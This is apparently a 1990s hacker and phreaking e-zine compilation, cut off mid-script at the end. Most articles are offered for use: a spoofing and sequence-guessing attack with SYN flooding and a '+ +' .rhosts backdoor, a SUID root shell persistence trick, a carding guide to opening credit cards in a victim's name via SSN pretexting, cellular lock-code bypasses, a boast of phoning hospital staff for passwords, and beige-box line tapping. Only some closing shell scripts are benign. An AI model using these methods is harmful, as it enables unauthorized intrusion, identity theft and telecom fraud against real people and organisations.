YOU --SYN-----> HOST
(You send out a SYN Packet to the host, telling it you want to connect)
YOU <--ACK----- HOST
(Host responds with an ACK or acknowledgment that it is alive and open)
YOU -----ACK--> HOST
(You respond back and the data transfer can now begin..)
Every time you do a regular data transfer on the internet such as
bring up a webpage this three way handshake commences. So now you know how
data gets from that machine to yours, this little information is the basis
of this attack.
.rhosts and trusted servers
---------------------------
Aright lets say you have in internet account, with a local Internet
service provider (ISP), AND you have an account with another server, which
gives you a shell account. A shell account is basically an account on the
servers UNIX operating system. They give you a home directory in which you
have access to the text editors such as Joe, and Pico, and you can also
work on c programs using the gcc compiler.
O.K. now lets say you want to save some time, so you want to make
the process of logging in to the shell account shorter, or maybe eliminate it
completely. Well due to the trust that a UNIX operating system has with its
users, this can be done, the process of entering a password at the login
screen can be illiminated. This can be done with a file called .rhosts, which
will grant or deny access based off the IP address of the person trying to
logon to the shell account its self.
The server that is in the .rhosts file is called the trusted server
for the fact that when it sees that IP address it trusts them. It thinks
that they are the person that is supposed, and allowed to be there. UNIX
will trust ANYONE with the specified ip address in the .rhosts file.
SYN Flooding
------------
A port on most UNIX operating systems can only handle a certain
number of connections to one port at a time, this is called the "backlog". If
the backlog is filled up all incoming SYN connections will be ignored.
Leaving them not allowed to connect to the server until the other
connecting requests are dealt with properly.
But if the SYN headers are spoofed when sent to the host the host
will keep on trying to successfully find the person who sent the original
syn message to it, and wont let anyone connect until it is done. Here's the
step of a SYN Flood
1) Person uses ip spoofer to spoof his original ip address and sends out a
several SYN packet to a specified port at a host.
2) The host's port gets flooded with SYN's and try's to reply to the SYN
command but cant because the person who sent the original SYN is not a
real host, leaving the ports closed, so no other connections can be made into
that host.
YOU (Spoofed IP) --SYN-----> HOST |
YOU (Spoofed IP) --SYN-----> HOST |
YOU (Spoofed IP) --SYN-----> HOST |
YOU (Spoofed IP) --SYN-----> HOST | From here on all other connections
YOU (Spoofed IP) --SYN-----> HOST | Will be ignored because all the
YOU (Spoofed IP) --SYN-----> HOST | connections are taken
YOU (Spoofed IP) --SYN-----> HOST |
X (Not really real) <--ACK-- HOST|
So in turn the HOST cannot find YOU (With the spoofed IP) so the port is left
flooded because the host will not drop the connections until they are fur
filled. After a bit the server will crash.. This is called a "Denial of
service attack" For the fact that it denies anyone else service to that host
you can read more about denial of service in this newsletter.
Sequence Numbers?
-----------------
Sequence Numbers are a prime factor in this attack, but also kinda
hard to explain. I only have a general knowledge of sequence numbers, but a
general knowledge is a hell of alot better then no knowledge ;) Every byte
that you transfer from one computer to another on a Internet network it is
assigned a sequence number. Sequence Numbers are assigned to make sure that
the connection that is made doesn't become corrupt.
Lets say we didn't have sequence numbers, then maybe by accident we
got a repeat of a byte, that would corrupt our data right there.
IN a three way handshake, the first sent SYN packet contains what is
called the Initial Sequence number, that sequence number tells the host what
the next sequence number is. (Confused yet) This will all come together when
I explain the attack at itself, its all got to do with timing and round
trip time.
Round trip time is how long it takes your SYN packet to reach the
host and the host to send back its ACK (acknowledgment) lets say you had to
do this all by hand, you send out the SYN command, and the host sends back
the ACK command, you have to calculate the exact sequence numbers timing
in order to send the ACK back to the host to start the data transfer.
-If the sequence number you send is a smaller number then what
the server expects it will just throw that try off, because it
thinks its an old packet that never reached or has failed before
-If the sequence number is exactly what the host expected, it will
let the ACK come through and the data transfer can begin.
-If the sequence number you send is greater then what the host
expects it will hold that sequence number, because it think that
it is a future bit, and it will hold it until the other bits
come through first..
Trust me this may all sound stupid now when I'm explaining it, but it all
does come together when I start explaining the attack, you need to be able
to spoof the ACK command that goes to the host when doing the 3 way handshake
Oh and each time a connection is made to the host that you are making
the connection to the sequence numbers goes up 64,000. The Incicial sequence
number goes up 128,000 every one second, and wraps every 9.32 hours. This
counting process will be needed later on in the attack..
The Attack
----------
I really cant express enough how much you need to understand the above
features before going and trying to execute this attack, just for the fact
that you will not be successful in your attempt, it took me 3 good days of
reading to readily understand sequence numbers, and I suggest you also read
all you can on sequence numbers, do searches, read internet protocol articles
just make sure you understand what you are doing before you get your hopes
up to find out that you didn't calculate the Round trip time right and you
end up with a smaller sequence number then originally intended. Its a bummer
and a waste of time if you don't understand it.
Short Explanation
-----------------
1)Choose the target
2)Find trusted host
3)SYN Flood trusted host
4)Spoof the trusted host
5)Guess the sequence numbers for the outgoing ACK
6)Make the connection
7)Leave a backdoor in the .rhosts file
Finding a Target
----------------
This should be fairly easy based on the fact that if your the kind
of person who has a personal vendetta with a server or you just want to try
this out on. Or you can get special permission from 2 hosts that will allow
you to do this as a security measure, that is probably the best way to go to
avoid any sorts of criminal prosecutions. I urge you to not in any way
incriminate yourself, this text is for security reasons only to inform, and
protect. This attack is NOT new, I did not make up this attack, I'm only
explaining it, and how to prevent it. So don't come crying to me when you get
raided and you have no where else to go. Stay safe and be paranoid.
Finding a targets Trusted Host
------------------------------
Once you have your target, you want to find out if it has a trusted
host, since you cant go into their computer and look to see if they even have
an .rhosts file you have to do the checking out yourself. If the target host
does not have a trusted host, this whole text is very pointless, but from
here on in, I am talking as if the target host does in fact have a trusted
host.
This is where you use your talent of social engineering. Finding the
trusted host is hard, Ill admit that, but if your going to go this far you
might as well find out about the system your going to hack, know what your
doing, know the system before you go in. Here is a list of possible ways
to maybe gain information about trusted hosts.
showmout -e target ->SHows where the file systems are exported
finger -l @target
finger -l @trustedserver.com
finger -l root@trustedserver.com
rpcinfo -p x-terminal
These are a couple of ways off the top of my head, but you can always
find shit out, Basically use your head in this matter, because well, this isn't
the hardest part of the attack, it may seem that way now, but it only gets
harder from here on out. Talk to a representative of the company, I dunno
read up on social engineering...
Over all this attack all comes down to trusted hosts, which are
inserted into the .rhosts file itself, this is why I spent a some time
explaining .rhosts files, because if you can become the trusted host you
also have access to the target host. Is this getting better by the minute or
what?
SYN Flood trusted host
----------------------
In order for this whole thing to go through the trusted host must be
taken out with a SYN flood (SYN Flood was discussed earlier in this article)
for the fact in later parts of this attack you need to spoof as the trusted
host then send out a SYN command to the target host's port to try to connect
to it, and if the host your attacking can send a message back to the trusted
host, it would get an error saying that host did not send out a SYN packet
for an opening connection, so in turn to make sure that does not happen. You
must flood the ports of the trusted host so no other connections can be made.
*NOTE* This is because you are flooding ports on the trusted host
and when the port in the trusted host is still looking for
someone to send back an ACK (It is still gagged by the SYN flood)
command to it doesn't let any other connections come through. So
you can successfully guess their sequence numbers that you guess
(IN time) that the trusted host would send to the target host.
SYN flooding software is readily available at many "Underground" sites
and I wont go into posting the code here for the fact I'm just wasting space
when you can do a search on the internet yourself and find it. For example a
very good spoofer/SYN flooder can be found at http://main.succeed.net/~coder.
But this NEEDS to be done, you don't need any interruption's in this attack.
Sample the sequence numbers
---------------------------
Because you are not the real host you are mearly a spoofed version of
the trusted host, you also have to spoof the return sequence number. Remember
in the three hand shake there is first a SYN from you, that tells the host
that you want a connection to its server, then the host sends back an ACK
or acknowledgment.
So if you spoof the trusted server and send out a SYN packet, the
server you just sent the SYN packet to will try to reply back. If you don't
guess the right sequence numbers (OR the timing of the transfer) it wont
let you log in. See if the REAL trusted host was available (Not under a SYN
flood) the real trusted host would have given the other host an error. But
with the SYN flood gumming up the works, and not allowing any other
connections, you can successfully spoof back the ACK back to the host so
you can connect.
Before you do the initial attack connect to one of the major ports
on the server your going to attack, like port 25 (The sendmail port) and
sample its sequence numbers. You need to calculate how long it takes for
Your SYN reaches the server and an SYN/ACK is sent back to you, then the
ACK you send back to the host, all in one. Do this many times until you have
enough you feel is a good diagram to round up and become a one figure.
Remember sequence numbers go up 128,000 a second, and 64,000 per connect.
-If the sequence number you send is a smaller number then what
the server expects it will just throw that try off, because it
thinks its an old packet that never reached or has failed before
-If the sequence number is exactly what the host expected, it will
let the ACK come through and the data transfer can begin.
-If the sequence number you send is greater then what the host
expects it will hold that sequence number, because it think that
it is a future bit, and it will hold it until the other bits
come through first..
Spoof the trusted host
----------------------
This is easy there are many ip spoofer software for linux and the
unix flavors, just pick one of these up and compile it. *NOTE* You must have
root on the linux operating system you are doing the attack from for the fact
that if you just have a regular home directory you cannot open up raw
connections in which are needed for a general spoof.
So load it up and spoof the address of the TRUSTED host, and go right
on to the next part.
The heart of the attack
-----------------------
This is the main part of the attack, once you are spoofed as the
trusted host, you should send a connection request to port 513 (The login
port) Then the host will then send back a SYN/ACK to the trusted host, which
is under the gagging of the SYN Flood so it wont accept anymore connections
hence it wont get an error back. While this is all going on we have to wait
for a bit for the SYN/ACK to be sent to the host. Now you must send an ACK
back to the host you are attacking with your guessed Sequence number attached
(Plus one because we are sending for a login) If your guess is correct it
will then accept your connection.
Type the magical word root and since that .rhosts file is there, and
you are spoofed as the trusted host, you will get automatic access to the
system. Isn't unix great? Trust is a great thing to encounter in any type
of linux operating system.
Once inside..
-------------
Since you really don't need to edit or destroy any log files, you are home
free, but as one last thing we do, we will put in a backdoor so we can
access their system as we please (No more of this spoofin shit) so we do a
cat + + >> ~/.rhosts . When you add a + + (as explained earlier) its basically
saying any host is allowed without entering a password. The only problem
with that alot of systems now adays are equipped with a program that looks
for .rhosts files that have a + + file..But oh well fuck it, your in it just
for the hack of it right?
Conclusion paragraph
--------------------
Basically this attack is very useful if you know what you are doing.
This wasn't as 'in depth' as I would have liked to go, but well, I'm not the
kind of person who can splash what's all in my head onto a piece of paper, its
easier for me to consume information then give it away. But I tried my best
and I hope you could understand it.
Id like to give a couple shoutouts to the people who made this
article happen. Phrack, Modify for teaching me the art of spell check, and
the whole 0 cr3w. Remember before asking a question, always try to answer it
yourself first.
Phe3r m3,
Merde Fuk
_____________________________________________________________
One method to keep root...............WaRsPrItE
-----BEGIN PGP SIGNED MESSAGE-----
First off, this is NOT a true hack since it requires that you have
root access to begin with. I'm including it only as a way to keep root once
you find it. I mean c`mon, how hard is it to write a simple script or batch
job to do a "who -a | grep root" every five minutes and log the output to a
file at $home/.root and tail it to an xterm window? Sooner or later root will
forget to log off! I've only managed to get this to work on a few *NIX
systems and Solaris 2.4.1 and higher has fixed this hole. But those assholes
at Santa Cruz Operations ...... *evil grin*
# cp /bin/sh $home/.root_shell
# chmod 4111 $home/.root_shell
These commands create a SUID root version of the Bourne shell ("stickey bit")
in the home directory of the user. I personally use a file name with a "."
just to keep prying eyes out. You can optionally use commands like "chmod g+s"
to execute a file as the GUID of the file. Assuming of course you have access
as the approiate group to begin with. Which is easy `cause people always
forget to log off (especially around lunch time :) )This would be handy in
case you want to look at payroll records in say the "accounting" group.
Once again, security compromise via stupid end users!
WaRsPrItE
-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv
iQEVAwUBMd/HlH5eXk/jGmY7AQHPpQf/cn2vesmlxbIOdpIiVY53FUcoJmihsEuc
eTBMdCtyBibLxzVk9xak2GTtNcxppFphtLWh3v0f5aKF61NFSMsj7g1e1DcmMAn5
KTijlQc2pgB0OLhorsTA+/rSGl/TRa4uNVIYLpvCoU1H+5Y/kP8RuD1kgvgvl7Xe
R0zHmfqMYnRz5U8nedH2xagvnxnRixglt+bnYZS5/4fGuE9b2oz6iKbA7hG+ya9Q
rlTBvSd9uUw7nwtJgBdj7MMtlGwRhCUWP0pQBniYSbBOMfRZ22gL8is5lI2f8Tqh
To0YOe6T1dPvkYzYmvafz3F6IR5pnSltONeuUaeCSI3nBWGrpiaU/A==
=JVIc
-----END PGP SIGNATURE-----
-==-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=----=-=-=-=-=-=--=
Carding..more basics for the lame... BY ArcAngl
To check if a CC # is valid phone 1-800-228-1122 (need merchant # usually 5 digits)
To obtain a valid credit card under someone else's name:
1. Identify a target name, such as one of your teachers, co-workers, ect...
2. Once you have a target name, you need to obtain their SSN. This can be done in many ways
using social engineering. For example: call up the target's electric company, saying you are
him, and that you need to make a change to you mailing information possibly. Ask them what
information they have on record. Then say, also, I�d like to verify my SSN that you have, I had a mix up a
few years ago, and I want to make sure you have the correct one...what do you have?
3. Once you have the target�s SSN, obtain a Visa/MasterCard application. You can find these in many
places: banks, magazine inserts, ect...or simply call and request one. Once you have the application,
simply fill out the form with the target�s name. Now the hard part: for the address, you will need to have
a place that you have access to the mail delivery. DO NOT USE YOUR OWN! You may try: neighbors
on extended vacation, house where people just moved out, house just built, a friend that will deny any
receipt of a card, ect...you get the picture. Then fill in the target�s SSN and the rest of the info. Then
simply mail it! You may also call in the info and ask for overnight processing. Do this from a payphone, or op divert
for the uberelite!
4. The new card will be sent to the address you specified. It will be a valid card, in the target�s name and
all charges will reflect on the target�s credit report. It will take month�s for the target to realize there is a
card out there in his name. You have the physical card in your possession...how many times does
WalMart ask for ID when charging a new Pentium? NONE!!!! Oh yeah...watch for cameras that will id
you!
_____________________________________________________________
Cellular Programming Archives, Pt. I from Phrax
Phrax has been kind enough to provide everyone with a large
volume of information on cellular phone programming for about every
phone out there. Over the next few months, THTJ will be posting
cellular information from the large archive that Phrax has collected.
And, as always, this information is for informative purposes only, so
we know you will only use it for that, and not to phreak some phones
..... ( yea right! ).
-------
AUDIOVOX BC40, 45, CMT400, 405, 410, 450, 550, 600, 605, 750, 1700, SP75
NOTES: This is a single NAM unit.
The ESN prefix is 138 decimal, 8A hex (Toshiba)
You MUST know the lock code to program this unit.
Audiovox: 516-231-6051/213-926-7758
NAM programing:
1. With the power turned on enter N N N FUNC # 1, where NNN is the three
digit lock code. The manufacturers default is 000
2. The # key increments the step number.
3. The * key decrements the step number.
4. STO enters the data for each step.
5. You MAY directly access any step by pressing RCL followed by the step
number.
6. FUNC SND completes programing.
7. FUNC CLR exits programing mode.
PROGRAMING DATA:
STEP# #OF DIGITS/RANGE DESCRIPTION
01 3 DIGITS FIRST THREE DIGITS OF PHONE NUMBER
02 4 DIGITS LAST FOUR DIGITS OF PHONE NUMBER
03 3 DIGITS LOCK CODE
04 3 DIGITS AREA CODE
05 00001 - 32767 SYSTEM ID
06 0 OR 1 HORN ALERT
07 0 OR 1 HANDS FREE
08 0 OR 1 CONTINUOUS DTMF
09 0 OR 1 REPERTORY DIALLING
10 00 TO 15 GROUP ID (10 FOR USA)
11 00 TO 15 ACCESS OVERLOAD CLASS
12 0000 (ONLY) STATION CLASS MARK
13 0 OR 1 LOCAL USE MARK
14 0 OR 1 MIN MARK
15 0333/0334 IPCH, AUTOMATICALLY SET
16 0 OR 1 PREFERRED SYSTEM, AUTOMATICALLY SET
17 000 TO 255 SEE NOTE 1 BELOW
18 000 SET TO 000 ONLY
19 000 SET TO 000 ONLY
20 00001 - 99999 SYSTEM ID INHIBIT
21 0 TO 31 HORN ALERT TIME OUT IN HOURS (CMT 550 ONLY)
22 0 TO 31 ELEC MESSAGE RECORDER TIME OUT IN HOURS
(CMT 550 ONLY). SEE ALSO NOTE 2 BELOW.
23 0 TO 255 NO CHARGE AIR TIME DELAY IN SECS (NOT ALL MODELS)
24 000 TO 999 AIR TIMER CLEAR CODE
25 000 SET TO 000 ONLY
26 CHECKSUM AUTOMATICALLY SET
27 CHECKSUM AUTOMATICALLY SET
NOTES:
1. These options can be selected by adding together the following
codes:
0 = No options,
1 = Preferred system lock (not on CMT 550)
2 = Auto Lock (CMT 550 only),
4 = Call timer beep CMT 550 only),
8 = Home Roam inhibit,
16 = Automatic system redial (CMT 550 only).
Add together the codes of the desired options, for example to select
Call timer beep and auto redial add 4 to 16 for a code of 020.
2. 1 to 31 hours, except that a setting of 0 will turn phone off after
8 hours.
LOCK: F 4. UNLOCK: Enter three digit code.
A/B SYSTEM SELECT:
This procedure only works on models manufactured after September 19, 1987.
The first two digits of the serial number indicate the month (01-12), the
third digit of the serial number indicates the last digit of the year (198n).
FCN 7 STO = PREFERRED SYSTEM,
FCN 8 STO = HOME SYSTEM ONLY,
FCN 9 STO = NON PREFERRED SYSTEM,
FCN 0 SWITCHES BETWEEN A/B AND B/A,
PRESS STO WHEN THE DESIRED OPTION IS DISPLAYED.
------
AUDIOVOX CTX1500, 2500, 4000, 5000, BC410, 55, SP85, TRANS 410.
NOTES: These are single NAM units.
The ESN prefix is 138 decimal, 8A hex (Toshiba)
You MUST know the lock code to program this unit, see below for
"back door" programing methods.
Audiovox: 516-231-6051/213-926-7758
NAM programing:
1. With the power turned on enter N N N FUNC # 1, where NNN is the three
digit lock code. The manufacturers default is 000
2. The # key increments the step number.
3. The * key decrements the step number.
4. STO enters the data for each step.
5. You MAY directly access any step by pressing RCL followed by the step
number.
6. FUNC SND completes programming.
7. FUNC CLR exits programming mode.
PROGRAMING DATA:
STEP# #OF DIGITS/RANGE DESCRIPTION
01 10 DIGITS MIN (AREA CODE & PHONE NUMBER)
02 3 DIGITS LOCK CODE
03 00000 - 99999 SYSTEM ID
04 00 - 15 ACCESS OVERLOAD CLASS
05 00 - 15 SYSTEM ID (10 FOR USA)
06 0 OR 1 LOCAL USE MARK
07 0 OR 1 MIN MARK
08 0333 OR 0334 INITIAL PAGING CHANNEL
09 0 OR 1 PREFERRED SYSTEM
10 4 DIGITS STATION CLASS MARK
11 8 BINARY DIGITS FUNCTION 1, SEE NOTE 1 BELOW
12 8 BINARY DIGITS FUNCTION 2, SEE NOTE 2 BELOW
13 00 TO 31 HOURS POWER OFF TIMER (CTX 4000 ONLY)
14 000 TO 255 SECS NO CHARGE AIR TIMER DELAY
15 3 DIGITS CALL TIMER RESET CODE
16 - 20 00000 - 99999 SIDH INHIBIT # 1 THRU # 5
21 - 25 NOT USED FUTURE USE
NOTES:
1. This is an eight digit binary field.
10000000 = CALL TIMER BEEP
01000000 = AUTO LOCK
00100000 = AUTO SYSTEM REDIAL
00010000 = CALL RESTRICTION
00001000 = 32 DIGIT DIALING CAPABILITY
11111000 = ALL OF THE ABOVE
2. As above but options are:
10000000 = HANDS FREE
01000000 = CONTINUOUS DTMF
00100000 = REPERTORY DIALING
00010000 = HORN ALERT
00001000 = ALLOWS 911 CALLING WHEN UNIT IS LOCKED
01101000 = ALL OF THE ABOVE
A/B SYSTEM SELECT:
FCN 0 4 DISPLAYS CURRENT MODE,
FCN 0 0 = PREFERRED/NON-PREFERRED,
FCN 0 1 = PREFERRED ONLY,
FCN 0 2 = HOME ONLY
FCN 0 3 = NON PREFERRED ONLY,
"BACK DOOR" PROCEDURES:
We cannot guarantee the accuracy of these procedures, USE CAUTION!
SP 85
The lock code can be reset to 000 be shorting pins 6 and 17 on the handset
control conector.
CTX SERIES
Short pins 6 an 17 on the data cable, turn power on and enter 000 FUNC # 1.
TRANS 55 AND BC 55
Ground pin 1 of the six pin connector next to the modular jack on the
tranceiver. Looking at the tranciever with the modular jack to the right
of the six pin connector, pin one is bottom right.
LOCK: Press LOCK. UNLOCK: Enter three digit code.
SYSTEM SELECT: F 0 4 shows current mode. F 0 0 = Pref/Non pref, F 0 1 = Pref
only, F 0 2 = Home Only, F 0 3 = Non pref only.
------
Well this is all for this month, tune in next month for more
information.
_____________________________________________________________
Basic Social Engineering...............WaRsPrItE
-----BEGIN PGP SIGNED MESSAGE-----
I hesitate to even type this up and submit it for distribution. But I
want to make the point,that hacking takes RESEARCH! The easiest way to gain
access to somebody's account is to just ask them for their password.Here's a
perfect example.
One day visiting my Mom at work I was in the IS department at my
local hospital. I noticed a modem labeled "Dial Up" followed by the phone
number. So just for giggles I called it and saw.
<name of the hospital>
Medical Manager
SCO Unix release 2.3.4
login:
I went to the hospital the next day and found an old WYSE60 terminal with the
same login screen sitting on one of the desks. But the terminal also had a
sticker on it from the vendor advertising their support line. "In case of
trouble call <company name> 1-800-555-XXXX". Making a mental note of the
vendor's name I glanced down at the phone and made another mental note of an
inside line phone number. The next day I called the office on the inside line
and the conversation went something like this.
Office girl:
"<name of the department> Jackie speaking.How may I help you?"
Me:
"Hi Jackie! This is <fake name> calling from <company name>. How are
you?"
Office girl:
"Good. What can I do for you?"
Me:
"Well, we've been really busy here lately. We're upgrading the
cryptographic algorithm on your primary domain controller. As well as
re-compiling the user accounts database. And I thought I'd call
office to office to make sure that everyone could get in OK. Could
you log out and log back in for me?"
Office girl:
"Sure, no problem. Just a minute. Do I just enter "jjohnson" and
my password like always?"
Me:
"Wait a second and I'll dial in and check. You said you enter
"jjohnson"? And what password?"
Office girl:
"medical"
Me:
"All lower case?"
Office girl:
"yes"
Me:
"Well,<dramatic pause> it looks good on my end. Why don't you go
ahead and try"
Office girl:
"Ok....<long pause>......Ok I'm in!"
Me:
"Great! Thanks, if you run into problems give me a call here at
the office"
The thing that struck me about her password was it was "medical"
which was also apart of the title of the software package that they were
using. It sounded alot like the default password that came installed when the
vendor installed all the user accounts.So I promptly dialed in, logged in as
"jjohnson" with a password of "medical". The bummer was that I was within a
program and couldn't reach a shell prompt. No problem, I entered "!" (like
hacking PINE) and bingo, a "$" appeared. After that,I did a cat of
/etc/passwd to get a listing of all the logins. Notice I didn't do "shadow"
all I would've got is an "access denied" and a possible entry on the admin's
log. After that i logged off and checked all the other logins to see if they
were also using the defaut password of "medical". Sure enough,7 were!! It is
important to try this in case "Jackie" gets paranoid and calls the support
line and has her password changed. Then you're back to square one. The moral
of this story is, I managed to compromise the security of a major hospital
just by being friendly and confusing the office help. No k-rAd 3l33t3 haX
here, just stupid end users :) !
WaRsPrItE
-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.0
Charset: noconv
iQEVAwUBMd/IkH5eXk/jGmY7AQGR0Af/UTrFWHAjsWIsCBXha+LSAqtJ68548Khw
9ye7ug1HAVU9Mu5JmbmwoKcIoavfNeLPB/35zMAnCPmpFf92US8bCSAe1MbRrmQL
uzwqDjuo0SX/hco+HSqhd6fnajoGp9rqxEpq3QdwQ+/b9I8YTEraw30Yq+yA/Rsg
jtOmnAKvTlb/jSsvg8wmX0xqfTJZANIOvDFXa2+sVGwuY5uh9symfMKmUXzrpNQC
EZUtKMJnqVzpwIhZJPLAawgnFDbAu8mT8UZ/BQVJ/GeyaVwiDe8VzkuiACDY418f
kRFWDNSObbadWVuLoGxo9Ag6hfhquuptrRx8SJm19OgeUzam1dXX0Q==
=f/5Y
-----END PGP SIGNATURE-----
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-
DTMF Decoding - By ArcAngl
Ok, I have had the shits of having newbies beg for info on HOW TO DECODE DTMFs!!
So here it is.... 2 ways of many!
software:
WWW.Cyberramp.net/~shima/index.html
It will only decode 4 digits at a time with the shareware version, but if
you're clever, you record the wav file then edit it into pieces to decode
whole #'s.
...or
If you're clever, you will record the number, then dial your own pager #
and play it back into the phone, and press the pound sign when done. The
pager will show the # in a minute. ;-
_____________________________________________________________
-------------
--=[Redneck Phreaking]=--
By Shoelace
-------------
Hola! Shoelace here, writing a small, lame entry to inform people
near me, and in other places down South, about how easy it really is to
get even the simplest phreaking in. Contrary to popular belief, there are
phreaks in Tennessee. In my town, we have only 5 that I know of. The most
noted of course, is dr1x/kz. I think only three of us have modified our
Tone Dialers to make them into Red Boxes, with the help of Acid_novA. But,
the most simplest of all phreaking here, or at least in East Tennessee, is
Beige Boxing. You don't even need aligator clips, or really anything else
in the help files about Beige Boxing that you have probably read. All you
need is a screwdriver, and a regular phone. You see, behind all the houses
are these grayish colored boxes of varies sizes. They usually say
"Telephone Network Interface" on them. They are attached by screws. Unscrew
it, and open it up. You will see one, maybe two (if they have two lines),
holes with phone jacks in them. Take out that jack, and put in your phone.
You should have dialtone. Ta da! That is how easy it is to Beige Box down
South. I don't know what other states have their boxes like this, but if you
do, don't delay! Go out and Beige Box!
-Shoelace
-http://www.public.usit.net/sltaylor
-------
--=[The End]=--
-------
_____________________________________________________________
Basic UNIX Scripting...................WaRsPrItE
-----BEGIN PGP SIGNED MESSAGE-----
Here's some basic UNIX scripts that I found useful for searching a
system for log files, grep'ing for possible entries, and traversing
directory trees.These were written for SCO UNIX.
# .kshrc -- Commands executed by each Korn shell at startup
# Copyright (c) 1990, The WaRsPrItE Corporation Inc. =]
# All rights reserved.
# If there is no VISUAL or EDITOR to deduce the desired edit
# mode from, assume vi(C)-style command line editting.
if [ -z "$VISUAL" -a -z "$EDITOR" ]; then
set -o vi
fi
TMOUT=300
info()
{
echo "\nDate `date '+%m/%d/%y %H:%M'`\n"
echo "logname `logname`"
echo "Parent PID $PPID"
echo "Old pwd $OLDPWD"
echo "On `expr $SECONDS / 60` minutes"
echo "Path $PATH"
echo "cd path $CDPATH"
echo "Home $HOME"
echo "Time out $TMOUT"
echo "Current Jobs `jobs`"
echo "Spooler `lpstat`"
}
#-----------------------------------------------------------------
# Change Directory
# Changes directory and sets the new PS1 variable
#-----------------------------------------------------------------
ccd()
{
if [ $1 ]
then
cd $1
PS1="!_`logname`_`pwd`> "
fi
}
#-----------------------------------------------------------------
# List DIRectories
#-----------------------------------------------------------------
ldir()
{
l -F $1 | grep / | more
}
#-----------------------------------------------------------------
# File Find
# Recursively looks for a file from the working directory
#-----------------------------------------------------------------
ffind()
{
if [ $# = 1 ]
then
find . -name $1 -print
else
echo "Usage: ffind <filename>"
fi
}
#-----------------------------------------------------------------
# Recursive Grep
# Search's all files below working for search string
#-----------------------------------------------------------------
rgrep()
{
if [ $# = 1 ]
then
echo "Searching: $1"
find . -local -exec grep -il $1 {} \;
else
echo "rgrep: Invalid number of arguments"
fi
}
#-----------------------------------------------------------------
# Recursive Chmod
#-----------------------------------------------------------------
rchmod()
{
if [ $# = 1 ]
then
find . -local -exec chmod $1 {} \;
else
echo "Usage: rchmod <mode>"
fi
}
#-----------------------------------------------------------------
# Recursive Chown
#-----------------------------------------------------------------
rchown()
{
if [ $# = 1 ]
then
find . -local -exec chown $1 {} \;
else
echo "Usage: rchown <owner>"
fi
}
#-----------------------------------------------------------------
# Recursive Chgrp
#-----------------------------------------------------------------
rchgrp()
{
if [ $# = 1 ]
then
find . -local -exec chgrp $1 {} \;
else
echo "Usage: rchgrp <group>"
fi
}
alias cd="ccd"
alias home="cd $HOME ; clear ; m"
alias .l="history"
alias .x="fc -e -"
alias .e="fc -e vi "
#-----------------------------------------------------------------
# Total the size of the file in current directory
#-----------------------------------------------------------------
total()
{
clear
l $1 | awk '
{ if ( $1 != "total" ) {
counter = counter + $5
printf("%10s %s %s\n",counter, $0, system("file ",$1) }} ' | more
}
#-----------------------------------------------------------------
# Easy Change Directory
#
# I found this in a sys admin forum and modified it. Changed the
# home of the ecd files to /tmp to save room on the system. If
# you want everyone to have their own list just change the /tmp's
# to $HOME. Sorry the modules are not very well documented, it was
# late and I concentrated more on the code.
#
# Scott
#-----------------------------------------------------------------
ecd()
{
if [ $FCD ]
then
echo "sorry.."
return
else
FCD="Fcd"
export FCD
fi
echo
echo "Loading ecd: type \"ecd\" for information"
#-----------------------------------------------------------------
# add a directory to the list
#-----------------------------------------------------------------
addline()
{
error=0
echo "Enter full path of $Newline: \c"
read Fullpath
if [ -d $Fullpath ]
then
echo $Fullpath >> /tmp/ecd.list
else
echo "Sorry, can't find that directory!"
error=1
fi
}
#-----------------------------------------------------------------
# usage
#-----------------------------------------------------------------
function usage
{
echo "\n"
echo "Easy Change Directory:"
echo
echo "Usage: ecd directory-name"
echo " ecd -e directory for extended search."
echo " ecd -p to add current direcory to list."
echo " ecd -r to recursively scan directories under current."
echo "\n"
}
#-----------------------------------------------------------------
# main Loop
#-----------------------------------------------------------------
function ecd
{
error=0
FileDir=/tmp/ecd.list
Duplist=/tmp/ecd.dup
if [ $# = 0 ]
then
usage
return 0
fi
Extend="NO"
#-----------------------------------------------------------------
# Check for right parameters
#-----------------------------------------------------------------
case $1 in
"-e")
if [ $# != 2 ]
then
echo "Error: insufficient parameters ($#)"
echo "Usage: ecd -e directory"
fi
Extend="YES"
shift
;;
"/")
ccd /
return 0
;;
"-p")
CurDir=$(pwd)
grep "$CurDir\$" $FileDir > /dev/nul
if [ $? != 0 ]
then
echo $CurDir >> $FileDir
return 0
else
echo "Current directory $CurDir\n is already in $FileDir"
return 1
fi
;;
"-r")
echo "Scanning direcotories under $PWD"
find $PWD -type d -print >> $FileDir
cat "$FileDir" | sort | uniq > $Duplist
if [ $? = 0 ]
then
echo "Sorted and cleaned up $FileDir"
echo
mv $Duplist $FileDir
fi
return 0
;;
esac
#-----------------------------------------------------------------
# Does a list exist? if not make one
#-----------------------------------------------------------------
if [ ! -f $FileDir ]
then
echo "Creating new $FileDir in /tmp. It may take a while..."
find /tmp -type d -print > $FileDir
fi
#-----------------------------------------------------------------
# Check the list
#-----------------------------------------------------------------
if [ $Extend = "YES" ]
then
grep $1 $FileDir > $Duplist
else
grep $1'